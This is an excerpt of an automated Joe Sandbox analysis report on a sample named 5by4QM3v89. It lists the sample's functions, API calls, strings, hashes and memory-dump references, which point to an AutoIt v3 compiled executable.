Instruction Fuzzy Hash: 91A2C075A00205CFCF26CF98C480AAEB7B6FF59314F65846AE906AB351D735ED42CB81

Function 003F445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,003CE398), ref: 003F446A
FindFirstFileW.KERNELBASE(?,?), ref: 003F447B
FindClose.KERNEL32(00000000), ref: 003F448B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 7b6929b5deae4954c1bee8256f2387f2300706ec1feb75086f9788dcf1c24710
Instruction ID: 5615f2a3a5dd553292b00f8d379e42f513dce1a85323437873c07e2e6e985476
Opcode Fuzzy Hash: 7b6929b5deae4954c1bee8256f2387f2300706ec1feb75086f9788dcf1c24710
Instruction Fuzzy Hash: 82E0D8324149086752106B38EC0D4FA775C9F05335F104765FD35D10D0E77499049599

Function 003A09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A0A5B
timeGetTime.WINMM ref: 003A0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A0E53
Sleep.KERNEL32(0000000A), ref: 003A0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 003A0EFA
DestroyWindow.USER32 ref: 003A0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003A0F20
Sleep.KERNEL32(0000000A,?,?), ref: 003D4E83
TranslateMessage.USER32(?), ref: 003D5C60
DispatchMessageW.USER32(?), ref: 003D5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D5C82

Strings

pbE, xrefs: 003D4FAE
@GUI_WINHANDLE, xrefs: 003D4F8F
@GUI_CTRLID, xrefs: 003D4F3A
@TRAY_ID, xrefs: 003D578F
pbE, xrefs: 003D57B4
@COM_EVENTOBJ, xrefs: 003D54F0
pbE, xrefs: 003D5003
pbE, xrefs: 003D4F59
@GUI_CTRLHANDLE, xrefs: 003D4FE4

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbE$pbE$pbE$pbE
API String ID: 4212290369-527556986
Opcode ID: 97dde995f8fcdbab2ee6b29884484d7d5a2a41db1319a1d5b71be16ef3175894
Instruction ID: d4ff869b2818e0304da74c05abb706090585bf4783bac78e144d4f0f7f2ccc67
Opcode Fuzzy Hash: 97dde995f8fcdbab2ee6b29884484d7d5a2a41db1319a1d5b71be16ef3175894
Instruction Fuzzy Hash: 18B2B071608741DFDB2ADF24D884BAAB7E5FF85304F14491EE49A9B3A1CB70E845CB42

Function 003F9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003F8F5F: __time64.LIBCMT ref: 003F8F69

Part of subcall function 00394EE5: _fseek.LIBCMT ref: 00394EFD

__wsplitpath.LIBCMT ref: 003F9234

Part of subcall function 003B40FB: __wsplitpath_helper.LIBCMT ref: 003B413B

_wcscpy.LIBCMT ref: 003F9247
_wcscat.LIBCMT ref: 003F925A
__wsplitpath.LIBCMT ref: 003F927F
_wcscat.LIBCMT ref: 003F9295
_wcscat.LIBCMT ref: 003F92A8

Part of subcall function 003F8FA5: _memmove.LIBCMT ref: 003F8FDE
Part of subcall function 003F8FA5: _memmove.LIBCMT ref: 003F8FED

_wcscmp.LIBCMT ref: 003F91EF

Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9824
Part of subcall function 003F9734: _wcscmp.LIBCMT ref: 003F9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003F9452
_wcsncpy.LIBCMT ref: 003F94C5
DeleteFileW.KERNEL32(?,?), ref: 003F94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003F9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F9534

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 6302d80579902492b348477bd0c6f4ec07da94d7cffe8da7534ead0d8e5e382b
Instruction ID: b46510704fa1dc251f9db824b9ce3ad33316d1eeb602c50ff6c19297866446db
Opcode Fuzzy Hash: 6302d80579902492b348477bd0c6f4ec07da94d7cffe8da7534ead0d8e5e382b
Instruction Fuzzy Hash: 67C12AB1D0021DAADF22DF95CC85FEEB7BDAF45310F0040AAF609EA151EB309A458F65

Function 0039301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00393074
RegisterClassExW.USER32(00000030), ref: 0039309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003930AF
InitCommonControlsEx.COMCTL32(?), ref: 003930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003930DC
LoadIconW.USER32(000000A9), ref: 003930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00393101

Strings

0, xrefs: 00393056
TaskbarCreated, xrefs: 003930A4
+, xrefs: 0039305D
AutoIt v3 GUI, xrefs: 00393090

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 387af742040695b893c6754c12f99170cd50bffab2ab29ba8b61d9935b7592be
Instruction ID: 7349b462022c31dd6b143354fb94c19f8ff7c62299d37713447278124824bd0b
Opcode Fuzzy Hash: 387af742040695b893c6754c12f99170cd50bffab2ab29ba8b61d9935b7592be
Instruction Fuzzy Hash: 5F3127B1841309AFDB40DFA4EC85BD9BBF0FB09311F10816AE590E62A1D3B94596CF99

Function 00393041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00393074
RegisterClassExW.USER32(00000030), ref: 0039309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003930AF
InitCommonControlsEx.COMCTL32(?), ref: 003930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003930DC
LoadIconW.USER32(000000A9), ref: 003930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00393101

Strings

0, xrefs: 00393056
TaskbarCreated, xrefs: 003930A4
+, xrefs: 0039305D
AutoIt v3 GUI, xrefs: 00393090

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3d224649f5b86aa8f6c2c8d64a1fd737aeb7547cb76bf961d33c7f1b08923f36
Instruction ID: 1d0de4c1066628862010ff6ffbb7c9cb0e8020af5b863db8cf13473597296d68
Opcode Fuzzy Hash: 3d224649f5b86aa8f6c2c8d64a1fd737aeb7547cb76bf961d33c7f1b08923f36
Instruction Fuzzy Hash: 4521E5B1951308AFDB00EFA4E848BDDBBF4FB08701F00812AF514A62A1D7B545598F99

Function 0039708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00394706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004552F8,?,003937AE,?), ref: 00394724

Part of subcall function 003B050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00397165), ref: 003B052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003971A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003CE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003CE909
RegCloseKey.ADVAPI32(?), ref: 003CE947
_wcscat.LIBCMT ref: 003CE9A0

Strings

\, xrefs: 003CE9C3
\Include\, xrefs: 00397165
Include, xrefs: 003CE8BF, 003CE900
Software\AutoIt v3\AutoIt, xrefs: 0039719E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 06f27eb79a69cf9465cd206b4ea374cdc7f41969b0fd08c97cddde41bcf079c6
Instruction ID: f3349f159b8c0671816bf3aa6475712ec59916192de91250d07eca93026658b0
Opcode Fuzzy Hash: 06f27eb79a69cf9465cd206b4ea374cdc7f41969b0fd08c97cddde41bcf079c6
Instruction Fuzzy Hash: B5717C715083019EC706EF65E841AABBBE8FF88350F81493EF445CB1A2EB71D949CB56

Function 00393633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 003936D2
KillTimer.USER32(?,00000001), ref: 003936FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0039372A
CreatePopupMenu.USER32 ref: 0039373E
PostQuitMessage.USER32(00000000), ref: 0039374D

Strings

%B, xrefs: 003CD081, 003CD0CF
TaskbarCreated, xrefs: 00393725

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%B
API String ID: 129472671-3505266058
Opcode ID: e92e21c7f41dac6c821b2704e10807f20bcb47f80d4e4331fba070726eb8a408
Instruction ID: 2dde4b8da19dea5faccc200f179d7b2d4b636c71d038aab57e29236705a3b4e8
Opcode Fuzzy Hash: e92e21c7f41dac6c821b2704e10807f20bcb47f80d4e4331fba070726eb8a408
Instruction Fuzzy Hash: 4E414AF2200605BBDF136FA8DC59FBA3758EB01301F140139FA02D62E2DB74AD15976A

Function 00393A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00393A50
LoadCursorW.USER32(00000000,00007F00), ref: 00393A5F
LoadIconW.USER32(00000063), ref: 00393A76
LoadIconW.USER32(000000A4), ref: 00393A88
LoadIconW.USER32(000000A2), ref: 00393A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00393AC0
RegisterClassExW.USER32(?), ref: 00393B16

Part of subcall function 00393041: GetSysColorBrush.USER32(0000000F), ref: 00393074
Part of subcall function 00393041: RegisterClassExW.USER32(00000030), ref: 0039309E
Part of subcall function 00393041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003930AF
Part of subcall function 00393041: InitCommonControlsEx.COMCTL32(?), ref: 003930CC
Part of subcall function 00393041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003930DC
Part of subcall function 00393041: LoadIconW.USER32(000000A9), ref: 003930F2
Part of subcall function 00393041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00393101

Strings

#, xrefs: 00393AFB
0, xrefs: 00393AF4
AutoIt v3, xrefs: 00393B05

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: a02527d924ecb9a5f52b2d78abb65cd3bf5d8bcac1e26c8c4db29579efb172ca
Instruction ID: e0c72611dc3162622b264bd00e8103675179cad146d244accc20066c20a935bb
Opcode Fuzzy Hash: a02527d924ecb9a5f52b2d78abb65cd3bf5d8bcac1e26c8c4db29579efb172ca
Instruction Fuzzy Hash: CA215C74D10708AFEF11DFA4EC59BAD7BB4FB08712F00417AF504AA2A2D3B596458F88

Function 00393766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINE, xrefs: 00393822
/AutoIt3ExecuteScript, xrefs: 003938BC
/AutoIt3ExecuteLine, xrefs: 003938A7
/ErrorStdOut, xrefs: 0039387D
RE, xrefs: 003CD213
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003937AE
CMDLINERAW, xrefs: 003937FB
/AutoIt3OutputDebug, xrefs: 00393892

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RE
API String ID: 1825951767-2473233043
Opcode ID: 5da8ff9fc5d56a18e3f960abba3b7918f43e3f607aaaad670f758ddb0802b255
Instruction ID: ce0df4951935cf9e22d25f04050238759b5fa03b277a642af9307ec22e99dadf
Opcode Fuzzy Hash: 5da8ff9fc5d56a18e3f960abba3b7918f43e3f607aaaad670f758ddb0802b255
Instruction Fuzzy Hash: 3BA150B2D1021D9ADF06EBA4DC51EFEB778BF15300F44052AF416AB192EF749A49CB60

Function 0039F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003B0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B0193
Part of subcall function 003B0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 003B019B
Part of subcall function 003B0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B01A6
Part of subcall function 003B0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B01B1
Part of subcall function 003B0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003B01B9
Part of subcall function 003B0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003B01C1

Part of subcall function 003A60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0039F930), ref: 003A6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0039F9CD
OleInitialize.OLE32(00000000), ref: 0039FA4A
CloseHandle.KERNEL32(00000000), ref: 003D45C8

Strings

%B, xrefs: 0039F796, 0039F7A8, 0039F96E, 0039FA51
\TE, xrefs: 0039F7F7
SE, xrefs: 0039F7EB
<WE, xrefs: 0039F930

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WE$\TE$%B$SE
API String ID: 1986988660-1739124915
Opcode ID: cc2f95f64634ccfd297232235da82d48443cbc71c185568fef52332280341aee
Instruction ID: 3628f5aa9497a19cea43fb4c179b3a0ae732d18643aa7a590227ccb99664285f
Opcode Fuzzy Hash: cc2f95f64634ccfd297232235da82d48443cbc71c185568fef52332280341aee
Instruction Fuzzy Hash: AA81BBB0911B40DF8785EF29A8617387BE5EB9A307B90813AD819CB273E7749485CF19

Function 01318070 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01318141
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01318367

Memory Dump Source

Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: 29ec41bd95fb6177258684504dbfd3a66e912b8288dda8626ed6ec864812baa7
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: 5FA10B74E00209EBDB18CF94C894BEEBBB5FF48308F208599E605BB284D7759A41CF54

Function 003939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00393A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00393A24
ShowWindow.USER32(00000000,?,?), ref: 00393A38
ShowWindow.USER32(00000000,?,?), ref: 00393A41

Strings

edit, xrefs: 00393A1E
AutoIt v3, xrefs: 003939FB, 00393A00, 00393A01

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ae21110bd7217d307b52b4442e9c16c7dcf432587ee5502d86b7421137f5d5a2
Instruction ID: 2864bb10bb4c55f5339a60f80831a3b51addff08c921b74c00aa6b15f9fe443f
Opcode Fuzzy Hash: ae21110bd7217d307b52b4442e9c16c7dcf432587ee5502d86b7421137f5d5a2
Instruction Fuzzy Hash: 88F03A706407907FEA315723AC18E7B2E7DD7C6F51F00407AB908E21B1C2A55841CFB8

Function 01317DE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01317CD0: Sleep.KERNELBASE(000001F4), ref: 01317CE1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01317F59

Strings

8KFO2MZ8MKTGF31C9FS8JD6VB1U6O, xrefs: 01317FC2, 01317FC5

Memory Dump Source

Source File: 00000000.00000002.1394800227.0000000001315000.00000040.00000020.00020000.00000000.sdmp, Offset: 01315000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1315000_5by4QM3v89.jbxd

Similarity

API ID: CreateFileSleep
String ID: 8KFO2MZ8MKTGF31C9FS8JD6VB1U6O
API String ID: 2694422964-1426172293
Opcode ID: dce0d8b79906e7d28a2ecef5222aaed4395941c05b45cc04674120c331ace1e9
Instruction ID: a8c9022515cd73f02bff38a72e0870379bd926358c38bbfce1a98174dede7027
Opcode Fuzzy Hash: dce0d8b79906e7d28a2ecef5222aaed4395941c05b45cc04674120c331ace1e9
Instruction Fuzzy Hash: B9718630D0438DDAEF15D7E8C8447EEBB75AF19704F044199E248BB2C1D7BA0A49CB66

Function 0039407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003CD3D7

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

_memset.LIBCMT ref: 003940FC
_wcscpy.LIBCMT ref: 00394150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00394160

Strings

Line: , xrefs: 003CD400

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: c90294875cdb301d5cc816724457fcfbf7c6de1ba9bfcc17d109b3d629f2bd62
Instruction ID: 171a92fb2d2a033e3d069c408e5c899610a3d85064de7b40f702714d0836fc63
Opcode Fuzzy Hash: c90294875cdb301d5cc816724457fcfbf7c6de1ba9bfcc17d109b3d629f2bd62
Instruction Fuzzy Hash: D631D371008704AFDB22EB60DC46FEB77DCAF54304F10462EF585961E2EB70A649CB8A

Function 0039686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00394DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394E0F

_free.LIBCMT ref: 003CE263
_free.LIBCMT ref: 003CE2AA

Part of subcall function 00396A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00396BAD

Strings

Bad directive syntax error, xrefs: 003CE292
>>>AUTOIT SCRIPT<<<, xrefs: 003CE039

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
